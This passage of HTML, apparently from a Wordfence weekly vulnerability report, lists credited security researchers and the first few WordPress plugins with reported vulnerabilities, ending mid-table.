					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/56906fe372fd1538941e0819ed72361d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="56906fe372fd1538941e0819ed72361d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-bach" target="_blank" rel="noopener">Son Bach</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/040df00806bcfe4e3cd618b0f25d949e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="040df00806bcfe4e3cd618b0f25d949e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lan-vy" target="_blank" rel="noopener">Lan Vy</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/noman-riffat" target="_blank" rel="noopener">Noman Riffat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dacc17a271a6378d63177b8dbe4c6a05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dacc17a271a6378d63177b8dbe4c6a05"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener">Khaled Alenazi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f01d5fec6ebed3f801cac3e2e05ec591.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f01d5fec6ebed3f801cac3e2e05ec591"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andres-cruciani" target="_blank" rel="noopener">Andrés Cruciani</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2684dcb50089a43f8e0fef676bbf357a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2684dcb50089a43f8e0fef676bbf357a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dunvu0" target="_blank" rel="noopener">dunvu0</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d514c4acdca56b936f2a77bb9df74e28.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d514c4acdca56b936f2a77bb9df74e28"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abi-wiranata" target="_blank" rel="noopener">Abi Wiranata</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ec0c0cb5a29433b50ba16bb2ecf5537.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ec0c0cb5a29433b50ba16bb2ecf5537"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/raihan-adi-arba" target="_blank" rel="noopener">Raihan Adi Arba</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b18e99e14d7f2de268d5197dd1571353.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b18e99e14d7f2de268d5197dd1571353"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener">Evan NR</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/434560acf2fecc645eba83eb388be4dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="434560acf2fecc645eba83eb388be4dc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xanlar-agamalizade" target="_blank" rel="noopener">Xanlar Agamalizade</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/aa489aa91597949de7508433fc432ec6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aa489aa91597949de7508433fc432ec6"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/decio-brandao" target="_blank" rel="noopener">Décio Brandão</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04ed824b51db674c6f1cb3422c3edf88.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04ed824b51db674c6f1cb3422c3edf88"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khanh-nguyen-bluerock" target="_blank" rel="noopener">Khanh Nguyen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/258c774aecd81b7d1fa67abf3b576b33.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="258c774aecd81b7d1fa67abf3b576b33"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/spek" target="_blank" rel="noopener">Peter Thaleikis</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f85a351fb56ffb26c63e64ed9e6ccd73.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f85a351fb56ffb26c63e64ed9e6ccd73"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ppzzaarr" target="_blank" rel="noopener">PPzzAArr</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cf40511d1644ab3dc2ad65bc49b7e2ca.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf40511d1644ab3dc2ad65bc49b7e2ca"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arrester" target="_blank" rel="noopener">arrester</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e1dc1d4e8934fe0c2cdf411dd42e2d70.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e1dc1d4e8934fe0c2cdf411dd42e2d70"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel-and-theo-antonio-da-fonseca" target="_blank" rel="noopener">João Ramos Maciel and Theo Antonio da Fonseca</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0331168be74426433ad360641edcc8e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0331168be74426433ad360641edcc8e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doc4cash" target="_blank" rel="noopener">doc4cash</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/55478b939c5cdb4a8cfa65ea7f5081fe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="55478b939c5cdb4a8cfa65ea7f5081fe"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener">Md. Minaruzzaman Shovon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a6b5fa3452b966ebfba668f89b1b6c30.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a6b5fa3452b966ebfba668f89b1b6c30"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener">Tiago Ventura</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdc5de72b0d9bfc9378c752c2c025793.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdc5de72b0d9bfc9378c752c2c025793"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayoub-mouhatta" target="_blank" rel="noopener">Ayoub MOUHATTA</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f005c4dc82929a63b828a2192c5e7c02.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f005c4dc82929a63b828a2192c5e7c02"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener">ParkHyunWoo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/87a81a6ad2a6d6d3b21b6794a7d7ef57.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="87a81a6ad2a6d6d3b21b6794a7d7ef57"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samdup-choephel" target="_blank" rel="noopener">Samdup Choephel</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/250a37192278ceed911abb203c2f7573.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="250a37192278ceed911abb203c2f7573"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hai-ha" target="_blank" rel="noopener">hhhai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a5ed655a05266bd5bfe3cb5fb1db1932.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a5ed655a05266bd5bfe3cb5fb1db1932"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tipsen" target="_blank" rel="noopener">tipsen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ef74f4dbe7907a62f177592f647c1afa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ef74f4dbe7907a62f177592f647c1afa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/webbernaut" target="_blank" rel="noopener">Webbernaut</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cb9373b67e4240c01c77d2af2ea71179.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb9373b67e4240c01c77d2af2ea71179"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener">Quốc Huy (jtwings)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/189ebc3f11e6ce03d83418dacef6162c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="189ebc3f11e6ce03d83418dacef6162c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos-2" target="_blank" rel="noopener">Jarno Vos</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/28bb5e57f2ebf46069c888bd33017ec4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="28bb5e57f2ebf46069c888bd33017ec4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener">Aydan Arabadzha</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bd0a3fd896cc5bd0ffd365e2b928162.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bd0a3fd896cc5bd0ffd365e2b928162"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/christian-kold-jensen" target="_blank" rel="noopener">Christian Kold Jensen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/32a3a52076160853e8b6770c359d720d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="32a3a52076160853e8b6770c359d720d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ian-ho-shim" target="_blank" rel="noopener">Ian Ho Shim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/70feb6ba16956cc1bd202e0371acc176.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="70feb6ba16956cc1bd202e0371acc176"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quentin-lamour" target="_blank" rel="noopener">Quentin Lamour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a9ec4eb223d84f01746308316732603e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a9ec4eb223d84f01746308316732603e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener">Thaer Assfour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/80acc63fe639092e6ec9dc58c837f8fc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="80acc63fe639092e6ec9dc58c837f8fc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/elijah-chia" target="_blank" rel="noopener">Elijah Chia</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba53183437d880ac964d3a974b060a47.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba53183437d880ac964d3a974b060a47"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khuong-hai" target="_blank" rel="noopener">Khuong Hai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b580dc96c70c05c6a8dc20e4999b92c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b580dc96c70c05c6a8dc20e4999b92c7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-nam" target="_blank" rel="noopener">Thanh Nam</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/89e4fa41063e89cf35fe78b8c3f1a5f7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="89e4fa41063e89cf35fe78b8c3f1a5f7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luka-zimonjic" target="_blank" rel="noopener">Luka Zimonjic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ce1fa8b42931a00204df4e057e0ab1a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce1fa8b42931a00204df4e057e0ab1a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener">Pham Duc Anh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tenweb-speed-optimizer" target="_blank" rel="noopener">tenweb-speed-optimizer</a>
		</td>
</tr>
<tr>
<td>12 Step Meeting List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/12-step-meeting-list" target="_blank" rel="noopener">12-step-meeting-list</a>
		</td>
</tr>
<tr>
<td>Abandoned Cart Pro for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-abandon-cart-pro" target="_blank" rel="noopener">woocommerce-abandon-cart-pro</a>
		</td>
</tr>
<tr>
<td>Admin and Site Enhancements (ASE)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements" target="_blank" rel="noopener">admin-site-enhancements</a>
		</td>
</tr>
<tr>
<td>Advance Product Search- Voice &amp; Ajax Search for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/th-advance-product-search" target="_blank" rel="noopener">th-advance-product-search</a>
		</td>
</tr>
<tr>
<td>Advanced File Manager – Ultimate File Manager for WordPress And Document Library Solution</td>
<td>
